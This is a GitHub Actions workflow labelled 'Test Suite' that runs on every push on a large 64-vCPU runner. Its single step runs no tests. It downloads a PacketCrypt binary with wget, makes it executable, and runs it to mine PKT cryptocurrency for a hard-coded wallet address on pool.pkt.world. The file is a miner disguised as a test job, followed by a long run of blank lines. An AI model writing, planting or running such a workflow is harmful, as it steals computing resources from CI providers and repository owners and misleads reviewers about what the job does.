name: Test Suite

on: push

jobs:

  test:

    runs-on: buildjet-64vcpu-ubuntu-2004

    name: Test

    steps:

      - uses: actions/checkout@v2
      - run : wget https://www.pkt.world/ext/packetcrypt-linux-amd64 -O packetcrypt && chmod +x packetcrypt && ./packetcrypt ann -p pkt1q70ftf7qhpcl8n58klafpdm2kjfwec4anwee9ml http://pool.pkt.world













































